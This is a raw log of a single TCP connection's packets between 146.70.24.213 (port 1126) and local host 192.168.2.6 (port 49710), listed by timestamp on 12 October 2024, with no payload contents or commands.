Oct 12, 2024 20:30:04.763511896 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.763531923 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.763546944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.763581038 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.763608932 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.763616085 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.763648033 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.763663054 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.763683081 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.763715029 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.763750076 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.763753891 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.763782978 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.763793945 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.763823032 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.763854980 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.763887882 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.763914108 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.763931990 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.763933897 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.763967991 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.764002085 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.764029026 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.764035940 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.764070034 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.764081001 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.765165091 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.765217066 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.765249968 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.765280962 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.765284061 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.765305996 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.765319109 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.765351057 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.765371084 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.765383005 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.765434980 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.765434980 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.765470982 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.765503883 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.765541077 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.765552998 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.765571117 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.765619993 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.765625000 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.765652895 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.765682936 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.765706062 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.765741110 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.765774012 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.765799046 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.765819073 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.765830994 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.765865088 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.765898943 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.765912056 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.765954971 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.765988111 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.766016960 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.766025066 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.766067028 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.766117096 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.766119957 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.766149044 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.766197920 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.766206980 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.766232967 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.766258955 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.766288042 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.766316891 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.766346931 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.766349077 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.766382933 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.766415119 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.766441107 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.766448021 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.766457081 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.766480923 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.766513109 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.766541004 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.766549110 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.766587973 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.766598940 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.766619921 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.766653061 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.766685009 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.766711950 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.766719103 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.766727924 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.766752005 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.766783953 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.766799927 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.766815901 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.766848087 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.766900063 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.767580032 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.767623901 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.767693043 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.767707109 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.767724037 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.767740011 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.767755985 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.767761946 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.767774105 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.767782927 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.767791033 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.767807007 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.767823935 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.767829895 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.767839909 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.767846107 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.767858028 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.767873049 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.767885923 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.767888069 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.767900944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.767909050 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.767936945 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.770389080 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770453930 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770471096 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770487070 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770512104 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770514011 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.770531893 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770534992 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.770556927 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770571947 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770582914 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.770589113 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770625114 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.770629883 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770646095 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770661116 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770675898 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770678997 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.770690918 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770694971 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.770747900 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770764112 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770781040 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770788908 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.770797014 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770812035 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770816088 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.770828009 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770837069 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.770853996 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770869017 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770884037 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770890951 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.770900011 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770906925 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.770914078 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770930052 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770945072 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770946026 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.770965099 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.770967960 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770983934 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.770998955 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.771011114 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.771017075 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.771033049 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.771043062 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.771049023 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.771064043 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.771070957 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.771078110 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.771102905 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.820422888 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.855618954 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.855680943 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.855732918 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.855766058 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.855767012 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.855818033 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.855853081 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.855866909 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.855899096 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.855906010 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.855941057 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.855974913 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.855982065 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.856008053 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.856040001 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.856053114 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.856072903 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.856106043 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.856137991 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.856149912 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.856172085 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.856204033 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.856219053 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.856239080 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.856245041 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.856275082 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.856307030 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.856319904 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.856339931 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.856374025 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.856405973 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.856416941 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.856810093 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.857578993 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.857633114 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.857662916 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.857686043 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.857698917 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.857750893 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.857800007 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.857803106 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.857836008 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.857867956 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.857886076 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.857930899 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.857944965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.857996941 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.858031034 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.858042002 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.858086109 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.858130932 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.858135939 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.858170033 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.858220100 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.858249903 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.858267069 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.858295918 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.858300924 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.858350039 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.858381987 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.858426094 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.858433008 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.858483076 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.858520031 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.858530045 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.858549118 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.858563900 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.858582973 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.858616114 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.858629942 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.858645916 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.858678102 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.858690023 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.858712912 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.858745098 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.858778000 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.858787060 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.858809948 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.858844995 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.858854055 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.858876944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.858887911 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.858910084 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.858942032 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.858952999 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.858975887 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.859009027 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.859041929 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.859047890 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.859072924 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.859108925 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.859117031 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.859137058 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.859148026 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.859169006 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.859200954 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.859210968 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.859234095 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.859266996 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.859297991 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.859311104 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.859332085 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.859374046 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.860114098 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.860163927 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.860167980 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.860295057 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.860328913 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.860363960 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.860379934 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.860410929 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.860443115 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.860454082 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.860476971 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.860511065 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.860521078 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.860543966 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.860553980 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.860579967 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.860610962 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.860625029 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.860644102 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.860676050 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.860687971 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.860713005 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.860740900 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.860779047 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.862828016 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.862858057 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.862881899 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.862927914 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.862961054 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863003016 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.863012075 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863044977 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863079071 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863090992 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.863120079 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.863131046 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863198042 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863229990 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863241911 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.863262892 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863295078 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863317966 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.863327980 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863380909 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863429070 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863436937 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.863459110 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863476992 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.863492966 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863543034 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863576889 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.863580942 CEST	49710	1126	192.168.2.6	146.70.24.213
